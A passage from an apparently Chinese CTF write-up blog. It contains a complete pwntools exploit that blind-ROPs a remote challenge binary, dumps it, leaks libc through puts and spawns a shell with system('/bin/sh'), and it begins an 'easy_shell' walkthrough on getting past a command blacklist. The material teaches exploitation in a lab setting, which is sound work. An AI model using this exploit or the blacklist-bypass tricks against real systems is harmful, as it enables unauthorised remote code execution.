href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-40-1024x399.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"399\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-40-1024x399.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-694\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>dump_file\u51fd\u6570\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>def dump_file(buffer_size, gadget_addr, puts_addr, start_addr, end_addr):<br>    result = b\"\"<br>    while start_addr &lt; end_addr:<br>        payload = b'a' * buffer_size<br>        payload += p64(gadget_addr + 9) + p64(start_addr)<br>        payload += p64(puts_addr)<br>        try:<br>            io = get_io()<br>            io.sendline(payload)<br>            data = io.recv(timeout=0.2)<br>            io.close()<br>            try:<br>                log.info(\"%x --&gt; %s\" % (start_addr,data))<br>                if data == b\"\\n\":<br>                    result += b\"\\x00\"<br>                    start_addr += 1 <br>                    continue<br>                result += data&#91;:-1]<br>                start_addr += len(data&#91;:-1])<br>            except:<br>                result += b\"\\x00\"<br>                start_addr += 1 <br>        except:<br>            io.close()<br>            result += b\"\\x00\"<br>            start_addr += 1 <br>    with open('dump.bin', 'wb') as f:<br>        f.write(result)<br>        f.close()<\/code><\/pre>\n\n\n\n<p>\u6700\u7ec8\u4fdd\u5b58\u4e3adump.bin\uff0c\u5230\u6b64\uff0c\u5c31\u53ef\u4ee5\u5f00\u59cb\u6b63\u5e38\u89e3\u9898\u6b65\u9aa4\u4e86\uff0c\u5c06dump.bin\u62d6\u5165ida\u5206\u6790<\/p>\n\n\n\n<p>\u867d\u7136\u6211\u4eec\u6ca1\u6709\u628agot\u6bb5dump\u4e0b\u6765\uff0c\u4f46\u662fplt\u6bb5\u4e2d\u5b58\u5728\u7684\u504f\u79fbida\u80fd\u81ea\u52a8\u89e3\u6790\uff0c\u56e0\u6b64\u6ca1\u5fc5\u8981\u628agot\u6bb5\u4e5fdump\u4e0b\u6765<\/p>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\uff0c\u8fd9\u662fstart\u51fd\u6570\uff0c\u7b2c\u4e00\u4e2a\u53c2\u6570\u5373\u4e3amain\u51fd\u6570\uff0c\u53ea\u662f\u7f3a\u5c11\u4e86\u7b26\u53f7\u8868\u800c\u5df2\uff0c\u5bf9\u4e8e\u6f0f\u6d1e\u5206\u6790\u5b8c\u5168\u4e0d\u662f\u95ee\u9898<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-39-1024x616.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"616\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-39-1024x616.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-693\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-38.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"777\" height=\"300\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-38.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-692\"  sizes=\"auto, (max-width: 777px) 100vw, 777px\" \/><\/div><\/figure>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u8fd9\u4e2a\u51fd\u6570\u5c31\u662f\u4e00\u4e2a\u5f88\u660e\u663e\u7684\u6ea2\u51fa\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-37.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"648\" height=\"204\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-37.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-691\"  sizes=\"auto, (max-width: 648px) 100vw, 648px\" \/><\/div><\/figure>\n\n\n\n<p>\u63a5\u4e0b\u6765\u5c31\u662fret2libc\u4e86\uff0c\u6cc4\u9732puts\u5730\u5740<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-36.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"918\" height=\"177\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-36.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-690\"  sizes=\"auto, (max-width: 918px) 100vw, 918px\" \/><\/div><\/figure>\n\n\n\n<p>\u5230<a href=\"https:\/\/libc.blukat.me\/\">libc database search<\/a>\u5bfb\u627e\u5bf9\u5e94\u7684libc\u6587\u4ef6\uff0c\u5982\u679c\u65e0\u6cd5\u786e\u5b9a\u662f\u54ea\u4e2a\u7684\u8bdd\uff0c\u53ef\u4ee5\u591a\u6cc4\u9732\u51e0\u4e2a\u51fd\u6570\u7684\u5730\u5740\uff0c\u6bd4\u5982read\uff0c\u7136\u540e\u6dfb\u52a0\u6761\u4ef6\u5373\u53ef\uff0c\u6709\u7ecf\u9a8c\u7684\u8bdd\u5c31\u77e5\u9053\uff0c\u7248\u672c\u662f2.23-0ubuntu11.2_amd64\u62162.23-0ubuntu11.3_amd64,\u56e0\u4e3a\u5176\u4ed6\u7684\u51e0\u4e2a\u7248\u672c\u90fd\u592a\u8001\u4e86ctf\u6bd4\u8d5b\u4e2d\u51e0\u4e4e\u9047\u4e0d\u5230\uff0c\u7136\u540e\u5c31\u628a\u8fd9\u4e24\u4e2a\u6587\u4ef6\u4e0b\u8f7d\u4e0b\u6765\u4f5c\u4e3alibc\u6587\u4ef6\uff0c\u6328\u4e2a\u8bd5\uff0c\u770b\u54ea\u4e2a\u80fd\u6253\u901a\u5c31\u53ef\u4ee5\u4e86\uff0c\u6700\u7ec8\u7248\u672c\u662f2.23-0ubuntu11.3_amd64<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-35-1024x394.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"394\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-35-1024x394.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-689\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.arch = 'amd64'<br>libc=ELF(\".\/glibc-all-in-one\/libs\/2.23-0ubuntu11.3_amd64\/libc-2.23.so\", checksec = False)<br><br>def get_io():<br>    io = remote('ctf.ctbu.edu.cn',33626)<br>    # io = process(\".\/brop\")<br>    io.recvuntil(b'You can tell me something here: \\n')<br>    return io<br><br>def get_buffer_size():<br>    for i in range(1,300):<br>        payload = b'a'*i<br>        buffer_size = len(payload)<br>        try:<br>            io = get_io()<br>            io.send(payload)<br>            io.recvuntil(b'Okay, bye!')<br>            io.close()<br>            log.info(\"bad: %d\" % buffer_size)<br>        except :<br>            io.close()<br>            log.info(\"buffer_size: %d\" % (buffer_size-1))<br>            return buffer_size-1<br>        <br>def get_stop_addr(buffer_size):<br>    addr = 0x400500<br>    while True:<br>        addr += 1<br>        payload = b'a' * buffer_size + p64(addr)<br>        try:<br>            io = get_io()<br>            io.sendline(payload)<br>            response = io.recvuntil(b'Okay, bye!', timeout=2)<br>            if b'Okay, bye!' in response:<br>                io.close()<br>                log.info(\"stop address: 0x%x\" % addr)<br>                return addr<br>            else:<br>                io.close()<br>                log.info(\"bad: 0x%x - no message\" % addr)<br>        except Exception as e:<br>            try:<br>                io.close()<br>            except:<br>                pass<br>            log.info(\"bad: 0x%x - error: %s\" % (addr, str(e)))<br><br>def get_gadgets_addr(stop_addr, buffer_size):<br>    addr = 0x4006d0<br>    while True:<br>        addr += 1<br>        payload = b'a' * buffer_size + p64(addr) + p64(1)*6<br>        try:<br>            io = get_io()<br>            io.sendline(payload + p64(stop_addr))<br>            response = io.recvuntil(b'Okay, bye!', timeout=2)<br>            if b'Okay, bye!' in response:<br>                io.close()<br>                log.info(\"gadgets address: 0x%x\" % addr)<br>                return addr<br>            else:<br>                io.close()<br>                log.info(\"bad: 0x%x - no message\" % addr)<br>        except Exception as e:<br>            try:<br>                io.close()<br>            except:<br>                pass<br>            log.info(\"bad: 0x%x - error: %s\" % (addr, str(e)))<br><br>def get_puts_call_addr(buffer_size, gadget_addr):<br>    addr = 0x4006c4<br>    while True:<br>        addr += 1<br>        payload = b'a' * buffer_size <br>        payload += p64(gadget_addr + 9) + p64(0x400000)<br>        payload += p64(addr)<br>        try:<br>            p = get_io()<br>            p.sendline(payload)<br>            p.recvuntil(b'\\x7fELF')<br>            log.info(\"puts address: 0x%x\" % addr)<br>            p.close()<br>            return addr<br>        except:<br>            p.close()<br>            log.info(\"bad: 0x%x\" % addr)<br><br>def dump_file(buffer_size, gadget_addr, puts_addr, start_addr, end_addr):<br>    result = b\"\"<br>    while start_addr &lt; end_addr:<br>        payload = b'a' * buffer_size<br>        payload += p64(gadget_addr + 9) + p64(start_addr)<br>        payload += p64(puts_addr)<br>        try:<br>            io = get_io()<br>            io.sendline(payload)<br>            data = io.recv(timeout=0.2)<br>            io.close()<br>            try:<br>                log.info(\"%x --&gt; %s\" % (start_addr,data))<br>                if data == b\"\\n\":<br>                    result += b\"\\x00\"<br>                    start_addr += 1 <br>                    continue<br>                result += data&#91;:-1]<br>                start_addr += len(data&#91;:-1])<br>            except:<br>                result += b\"\\x00\"<br>                start_addr += 1 <br>        except:<br>            io.close()<br>            result += b\"\\x00\"<br>            start_addr += 1 <br>    with open('dump.bin', 'wb') as f:<br>        f.write(result)<br>        f.close()<br><br>def exp():<br><br>    # get_buffer_size()                               # 136<br>    # get_stop_addr(136)                              # 0x4006c4<br>    # get_gadgets_addr(0x4006c4,136)                  # 0x40075a + 9<br>    # get_puts_call_addr(136,0x40075a)                # 0x4006c9<br>    # dump_file(136,0x40075a,0x4006c9,0x400000,0x401000)<br><br>    io = get_io()<br>    buffer_size = 136<br>    pop_rdi = 0x40075a + 9<br>    ret = pop_rdi + 1<br>    puts_plt = 0x400520<br>    puts_got = 0x601018<br>    pd = b'a' * buffer_size<br>    pd += p64(pop_rdi) + p64(puts_got)<br>    pd += p64(puts_plt)<br>    pd += p64(0x4006D5)<br>    io.sendline(pd)<br>    puts_addr = u64(io.recvuntil(b'\\x7f')&#91;-6:].ljust(8,b'\\x00'))<br>    log.info(\"puts_addr: %x\" % puts_addr)<br><br>    libc_base = puts_addr - libc.symbols&#91;b'puts']<br>    log.info(\"libc_base: %x\" % libc_base)<br>    libc_system = libc_base + libc.symbols&#91;b'system']<br>    bin_sh_addr = libc_base + next(libc.search(b'\/bin\/sh'))<br><br>    pd = b'a'*136 + p64(ret) + p64(pop_rdi) + p64(bin_sh_addr) + p64(libc_system)<br>    io.sendline(pd)<br>    <br>    io.interactive() <br><br>if __name__=='__main__':<br>    exp()<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">okabe\u7cfb\u5217\u9898\u76ee\uff1a<\/h1>\n\n\n\n<h3 class=\"wp-block-heading\">easy_shell<\/h3>\n\n\n\n<p>\u8003\u70b9\uff1a $0\u5728\u90e8\u5206\u60c5\u51b5\u4e0b\u53ef\u4ee5\u83b7\u5f97\u7c7b\u4f3c\/bin\/sh\u7684\u6548\u679c\uff0c\u53e6\u5916\u5c31\u662fsh\u548c\/bin\/sh\u7b49\u4ef7<\/p>\n\n\n\n<p>\u8fdb\/shell\u540e\uff0c\u539f\u610f\u56fe\u662f\u8003\u5bdf\u62fc\u63a5\u6307\u4ee4\u7ed5\u8fc7<\/p>\n\n\n\n<p>\u9009\u624b\u89c6\u89d2\uff1a<\/p>\n\n\n\n<p>IDA\u6253\u5f00\u9644\u4ef6\uff0c\u770b\u5230\u6846\u4f4f\u7684\u5185\u5bb9<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-33-1024x649.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"649\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-33-1024x649.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-687\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u7531\u4e8e\u51fa\u9898\u4eba\u5bf9\u4e8e\u51fa\u9898\u6d41\u7a0b\u7684\u4e0d\u719f\u6089\uff0c\u6240\u4ee5\u9009\u62e9\u9759\u6001\u7f16\u8bd1\u7684\u539f\u56e0\uff0c\u770b\u8d77\u6765\u53ef\u80fd\u5f88\u96be\u53bb\u7406\u89e3\u5b83\u662f\u600e\u4e48\u5224\u65ad\u7684\uff08\u8fd9\u91cc\u7ed9\u5404\u4f4d\u65b0\u751f\u78d5\u4e00\u4e2a\uff09<\/p>\n\n\n\n<p>\u5b9e\u9645\u4e0a\u4e5f\u53ef\u4ee5\u53bb\u5927\u81f4\u731c\u4e00\u731c\uff0cstrcmp\u8fd8\u662f\u5f88\u5e38\u89c1\u7684\uff0c\u6211\u4eec\u770b\u770b\u5b83\u5728\u641c\u7d22\u5f15\u64ce\u91cc\u7684\u89e3\u91ca\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-34.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"842\" height=\"541\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-34.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-688\"  sizes=\"auto, (max-width: 842px) 100vw, 842px\" \/><\/div><\/figure>\n\n\n\n<p>\u5b83\u8bf4strcmp\u662f\u5728\u5bf9\u4e24\u4e2a\u5b57\u7b26\u4e32\u5185\u5bb9\u8fdb\u884c\u6bd4\u8f83\uff0c\u90a3\u4e48\u56de\u5230\u7ea2\u6846\u5185\u5bb9\uff0c\u5230\u5e95\u662f\u4ec0\u4e48\u5728\u548c\u4ec0\u4e48\u6bd4\u8f83\uff1f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>  if ( (unsigned int)j_strcmp_ifunc(v10, \"$0\")<br>    &amp;&amp; (unsigned int)j_strcmp_ifunc(v10, \"sh\")<br>    &amp;&amp; (unsigned int)j_strcmp_ifunc(v10, \"\/sh\") )<\/code><\/pre>\n\n\n\n<p>\u5927\u6982\u770b\u770b\u5c31\u77e5\u9053\uff0c\u662fv10\u5728\u548c&#8221;$0&#8243;&#8221;sh&#8221;&#8221;\/sh&#8221;\u8fdb\u884c\u6bd4\u8f83<\/p>\n\n\n\n<p>v10\u53c8\u662f\u4ec0\u4e48\u5462\uff1f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>  if ( !fgets(v10, 100LL, stdin) )<br>    return 1;<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\uff0c\u8fdb\u884c\u4e86fgets\uff0c\u5b83\u63a5\u53d7\u5230\u7684\u5185\u5bb9\uff0c\u5c31\u4f1a\u88ab\u5b58\u5230v10\u8fd9\u4e2a\u5b57\u7b26\u6570\u7ec4\u4e2d<\/p>\n\n\n\n<p>\u6bd4\u8f83\u5bf9\u4e86\uff0c\u5c31\u80fd\u8fdb\u4e00\u6b65\u5f80\u4e0b\u8d70<\/p>\n\n\n\n<p>\u4e5f\u5c31\u662f\u8fdb\u5165<code>filtered_shell()<\/code>\u51fd\u6570<\/p>\n\n\n\n<p>\u7136\u540e\u8f93\u51fa\u63d0\u793a\u4fe1\u606f<\/p>\n\n\n\n<p>\u5c31\u7b97\uff0c\u4f60\u6ca1\u60f3\u8fc7\u641cstrcmp\u662f\u600e\u4e48\u4e2a\u4e8b<\/p>\n\n\n\n<p>\u4e5f\u6ca1\u770b\u61c2\u903b\u8f91\u662f\u4ec0\u4e48\u60c5\u51b5<\/p>\n\n\n\n<p>\u90a3\u4f60\u770b\u5230\u5b83\u4e13\u95e8\u63d0\u51fa\u4e86&#8221;$0&#8243;&#8221;sh&#8221;&#8221;\/sh&#8221;<\/p>\n\n\n\n<p>\u5c31\u8f93\u5165\u8bd5\u8bd5\u770b\u561b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#\u7ed3\u679c\u5c31\u662f\uff1a\nEnter your command: sh\nPrivileges elevated! Starting restricted shell...\nRestricted shell. ls is allowed, but some commands are blocked.\nTry to get the flag, but remember: direct access is blocked!\n$<\/code><\/pre>\n\n\n\n<p>\u4f60\u770b\uff0c\u8fdb\u540e\u9762\u7684<code>filtered_shell()<\/code>\u51fd\u6570\u4e86\u5427<\/p>\n\n\n\n<p>\u597d\u4e86\uff0c\u73b0\u5728\u5462\uff0c\u6211\u4eec\u5728IDA\u91cc\u53cc\u51fb\u8fd9\u4e2a\u51fd\u6570<\/p>\n\n\n\n<p>\u8ddf\u8fdb\u8fd9\u4e2a\u51fd\u6570\u5185\u5bb9<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-31-1024x523.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"523\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-31-1024x523.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-685\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u786e\u5b9e\u5f88\u957f\u5f88\u6076\u5fc3\u5f88\u96be\u770b\u660e\u767d\u662f\u600e\u4e48\u4e2a\u4e8b<\/p>\n\n\n\n<p>\u4f46\u662f<\/p>\n\n\n\n<p>\u7ea2\u6846\u8fd9\u91cc\u7684\u5224\u65ad\u903b\u8f91\u8fd8\u662f\u5f88\u597d\u8ba4\u7684\u5427<\/p>\n\n\n\n<p>\u8fd9\u91cc\u4f1a\u628av8\u8fdb\u884c<code>is_forbidden<\/code>\u64cd\u4f5c<\/p>\n\n\n\n<p>\u597d\uff0c\u90a3\u4e48\u6211\u4eec\u7ee7\u7eed\u8ddf\u8fdb<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-32.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"651\" height=\"526\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-32.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-686\"  sizes=\"auto, (max-width: 651px) 100vw, 651px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u662f\u8fd9\u4e2a\u7a0b\u5e8f\u7b2c\u4e8c\u5173\u7684\u5224\u65ad\u9ed1\u540d\u5355\uff0c\u4e5f\u5c31\u662f\u8bf4\uff0c\u4f60\u8f93\u5165\u8fd9\u91cc\u7684\u4efb\u4f55\u4e00\u4e2a\u5185\u5bb9\u90fd\u662f\u4e0d\u88ab\u5141\u8bb8\u7684<\/p>\n\n\n\n<p>\u5176\u4e2d\uff0c\u5f88\u591a\u4eba\u60ef\u7528\u7684cat\u597d\u50cf\u6ca1\u88ab\u7981\u7528\uff0c\u4e3a\u4ec0\u4e48\u4ea4\u4e92\u91cc\u8fd8\u662f\u4e0d\u80fd\u7528\u5462\uff1f<\/p>\n\n\n\n<p>\u6b38\uff0c\u8fd9\u91cc\u4f60\u8ddf\u8fdb<code>unk_482010<\/code>\u770b\u770b\u5462<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-30-1024x59.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"59\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-30-1024x59.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-684\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u6240\u4ee5cat\u662f\u4e0d\u80fd\u7528\u7684<\/p>\n\n\n\n<p>\u90a3\u6211\u4eec\u600e\u4e48\u83b7\u53d6\u5230flag\u5462\uff1f<\/p>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u8981\u5f15\u51fa\u6307\u4ee4\u7684\u62fc\u63a5<\/p>\n\n\n\n<p>\u5b9e\u9645\u4e0abing\u641c\u7d22\u90fd\u80fd\u641c\u5230\u80fd\u7528\u7684\u6587\u7ae0\uff08\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-29-1024x897.png'><img class=\"lazyload lazyload-style-1\" 